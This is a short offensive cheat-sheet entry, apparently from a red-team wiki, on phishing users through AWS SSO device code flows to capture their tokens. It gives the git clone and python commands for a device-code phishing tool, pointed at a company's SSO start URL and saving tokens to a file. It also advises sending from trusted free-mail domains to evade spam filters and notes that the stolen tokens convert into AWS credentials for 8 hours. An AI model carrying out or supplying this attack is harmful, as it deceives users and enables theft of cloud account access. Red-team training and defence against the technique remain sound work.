Phishing via SSO Device Codes
Exploit AWS SSO device code flows to trick users into authenticating and returning valid tokens. Clone the AWS SSO Device Code Tool
git clone https://github.com/christophetd/aws-sso-device-code-authentication
cd aws-sso-device-code-authentication
python main.py \
--sso-start-url https://mycompany.awsapps.com/start \
--sso-region us-east-1 \
--output-file ./sso_token.json
note
Ensure your sender domain is unlikely to be flagged as spam. Commonly trusted domains include gmail.com, hotmail.com, yahoo.com, etc.
note
After the user authenticates, you’ll receive AWS SSO tokens valid for 8 hours, which can be exchanged for AWS credentials.